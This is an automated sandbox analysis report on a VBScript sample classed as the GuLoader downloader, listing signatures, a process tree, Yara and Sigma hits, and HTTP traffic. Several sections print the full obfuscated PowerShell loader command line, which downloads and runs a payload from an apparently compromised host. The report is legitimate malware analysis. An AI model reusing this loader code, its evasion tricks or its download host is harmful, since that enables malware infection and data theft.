Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S1a5ZF3ytp.vbs

Overview

General Information

Sample name:S1a5ZF3ytp.vbs
renamed because original name is a hash value
Original sample name:3f18b6b6686858e2d1707d38224c41129329efae694b883ac1cffa7617e30568.vbs
Analysis ID:1571032
MD5:1a749c44eb48b9cdddcdd8e00a6bd866
SHA1:555ed2c58801e005bba67f38174006eb1a1ff31d
SHA256:3f18b6b6686858e2d1707d38224c41129329efae694b883ac1cffa7617e30568
Tags:185-236-228-92vbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6548 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WMIC.exe (PID: 4600 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoiUnsBusmo=Se$FoTreoA k.eo tmTrpUmoT.nPaeBenVktEne es') ;Containeriseringers $Netmave;Containeriseringers (Tilbageholdte ' ,sSaTFaaAvRUftTi- s gl.aEPeeBiPPl oo4');Containeriseringers (Tilbageholdte 'Ud$ aGRiL .oNabTyA olAn:BeI NnUrGd Eb f eR SMVgA prB mutE,el,oa DDiEB =K.(G TOmESkSbrt .- apBrA iTQuh , ,$ dIslN BDVao rpLyhOxeP nw iPln u)') ;Containeriseringers (Tilbageholdte 'F.$AfgPelCloL bSpaS,LE :LoFP,oBor HfA jU,ETir SDG iGuNS,GAce arBa=Gr$JyG olCooA b .ALvLM : oPWao SI GnFiTD,w.eaG yStS ,+ X+ e%I $HoLPra GG dRM iPoN uGTes.rF WO hrunMB 3 l7Wo.UnC lOKnUUfn Kt') ;$Automatteoriens=$Lagringsform37[$Forfjerdinger]}$Agrees=317274;$Unanalytic=28672;Containeriseringers (Tilbageholdte 'W $GaGStlTeo rbMyA.il n:,dS atPrRVeA AIEjnDiS . Un=,c TgFeEC T c-,oC TO,aN,aTSeeToN .TYa Ve$PaIFiN PDTrO UpS H ESknHyIEnN');Containeriseringers (Tilbageholdte 'Ra$ cgLil aoStbm a DlBa:Unl CuOvfVbtDuaScn,egSur e UbSesRe i= F C [EkS yT.sFitSleVamAf.DiCBeo Un vF.e MrRytW ]Un:Fe:D FTor aoP,m,eBK,aThs Cepl6Pl4.rSdit TrW,iSunuogS (,k$ iSBatWrr aGriHenS s B)');Containeriseringers (Tilbageholdte 'On$ AgEvLFoOTrbHea lSu: eT nS,oPlm ,A BNIrI oa,a El= S N [.rS oyCos itStEEvMMi.,rT peunXBlT f.n ECaN c Go ADScISpN.ogPi]In:H.:Spa Rs CCStiOciEm.IngdiEIsTI sSutParAniklnReGun(Uf$OvLPruVoF AtAmapanTaGYarNge ibIdS ,)');Containeriseringers (Tilbageholdte ' I$ OGUnlPaOTibA a AlEk:F a ocHaOOpRS N ,S.k= S$KieRun ,O SM,pa Ln II ha s.MosS,UReb SVatBaRVai Dn Ug,a(Mo$ oaGaG,rr OEMuE.is , B$S U nkuAHan SaStLS y LTDeiFoCB,)');Containeriseringers $Acorns;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6640 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoiUnsBusmo=Se$FoTreoA k.eo tmTrpUmoT.nPaeBenVktEne es') ;Containeriseringers $Netmave;Containeriseringers (Tilbageholdte ' ,sSaTFaaAvRUftTi- s gl.aEPeeBiPPl oo4');Containeriseringers (Tilbageholdte 'Ud$ aGRiL .oNabTyA olAn:BeI NnUrGd Eb f eR SMVgA prB mutE,el,oa DDiEB =K.(G TOmESkSbrt .- apBrA iTQuh , ,$ dIslN BDVao rpLyhOxeP nw iPln u)') ;Containeriseringers (Tilbageholdte 'F.$AfgPelCloL bSpaS,LE :LoFP,oBor HfA jU,ETir SDG iGuNS,GAce arBa=Gr$JyG olCooA b .ALvLM : oPWao SI GnFiTD,w.eaG yStS ,+ X+ e%I $HoLPra GG dRM iPoN uGTes.rF WO hrunMB 3 l7Wo.UnC lOKnUUfn Kt') ;$Automatteoriens=$Lagringsform37[$Forfjerdinger]}$Agrees=317274;$Unanalytic=28672;Containeriseringers (Tilbageholdte 'W $GaGStlTeo rbMyA.il n:,dS atPrRVeA AIEjnDiS . Un=,c TgFeEC T c-,oC TO,aN,aTSeeToN .TYa Ve$PaIFiN PDTrO UpS H ESknHyIEnN');Containeriseringers (Tilbageholdte 'Ra$ cgLil aoStbm a DlBa:Unl CuOvfVbtDuaScn,egSur e UbSesRe i= F C [EkS yT.sFitSleVamAf.DiCBeo Un vF.e MrRytW ]Un:Fe:D FTor aoP,m,eBK,aThs Cepl6Pl4.rSdit TrW,iSunuogS (,k$ iSBatWrr aGriHenS s B)');Containeriseringers (Tilbageholdte 'On$ AgEvLFoOTrbHea lSu: eT nS,oPlm ,A BNIrI oa,a El= S N [.rS oyCos itStEEvMMi.,rT peunXBlT f.n ECaN c Go ADScISpN.ogPi]In:H.:Spa Rs CCStiOciEm.IngdiEIsTI sSutParAniklnReGun(Uf$OvLPruVoF AtAmapanTaGYarNge ibIdS ,)');Containeriseringers (Tilbageholdte ' I$ OGUnlPaOTibA a AlEk:F a ocHaOOpRS N ,S.k= S$KieRun ,O SM,pa Ln II ha s.MosS,UReb SVatBaRVai Dn Ug,a(Mo$ oaGaG,rr OEMuE.is , B$S U nkuAHan SaStLS y LTDeiFoCB,)');Containeriseringers $Acorns;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      Process Memory Space: powershell.exe PID: 1732JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 1732INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x1924f0:$b2: ::FromBase64String(
        • 0x22cd87:$b2: ::FromBase64String(
        • 0x22cdc2:$b2: ::FromBase64String(
        • 0x22cdfe:$b2: ::FromBase64String(
        • 0x22ce3b:$b2: ::FromBase64String(
        • 0x22ce79:$b2: ::FromBase64String(
        • 0x22ceb8:$b2: ::FromBase64String(
        • 0x22cef8:$b2: ::FromBase64String(
        • 0x22cf39:$b2: ::FromBase64String(
        • 0x22cf7b:$b2: ::FromBase64String(
        • 0x22cfbe:$b2: ::FromBase64String(
        • 0x2194b:$s1: -join
        • 0x30113:$s1: -join
        • 0xdab30:$s1: -join
        • 0xdf9e3:$s1: -join
        • 0x13a6ac:$s1: -join
        • 0x13ae0c:$s1: -join
        • 0x2d5dd9:$s1: -join
        • 0x2e2eae:$s1: -join
        • 0x2e6280:$s1: -join
        • 0x2e6932:$s1: -join
        Process Memory Space: powershell.exe PID: 6640JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Click to see the 1 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_1732.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi32_6640.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xbf0d:$b2: ::FromBase64String(
            • 0xafa0:$s1: -join
            • 0x474c:$s4: +=
            • 0x480e:$s4: +=
            • 0x8a35:$s4: +=
            • 0xab52:$s4: +=
            • 0xae3c:$s4: +=
            • 0xaf82:$s4: +=
            • 0x148b2:$s4: +=
            • 0x14932:$s4: +=
            • 0x149f8:$s4: +=
            • 0x14a78:$s4: +=
            • 0x14c4e:$s4: +=
            • 0x14cd2:$s4: +=
            • 0xb7b5:$e4: Get-WmiObject
            • 0xb9a4:$e4: Get-Process
            • 0xb9fc:$e4: Start-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", ProcessId: 6548, ProcessName: wscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", ProcessId: 6548, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoiUnsBusmo=Se$FoTreoA k.eo tmTrpUmoT.nPaeBenVktEne es') ;Containeriserin

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
            Source: unknownHTTPS traffic detected: 103.53.42.63:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000006.00000002.2992466321.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2992466321.00000000080E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb. source: powershell.exe, 00000006.00000002.2992466321.00000000080E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: Joe Sandbox ViewIP Address: 103.53.42.63 103.53.42.63
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET /km/microcheilia.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.ftsengineers.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /km/microcheilia.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.ftsengineers.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: www.ftsengineers.com
            Source: powershell.exe, 00000006.00000002.2988349216.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro_
            Source: wscript.exe, 00000000.00000003.1701929531.000002343AD5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1704814905.000002343AD6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703993978.000002343AD6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703713164.000002343AD6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692452905.000002343CCE7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000000.00000003.1693005129.000002343ADE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692939516.000002343ADBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?69b703ed3a0b2
            Source: wscript.exe, 00000000.00000003.1703830322.000002343AD4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1704797095.000002343AD5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1704425867.000002343AD4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1704449375.000002343AD5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/engramDataAU
            Source: wscript.exe, 00000000.00000003.1693005129.000002343ADE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692939516.000002343ADBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?69b703ed3a
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A9AFD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftsengineers.com
            Source: powershell.exe, 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
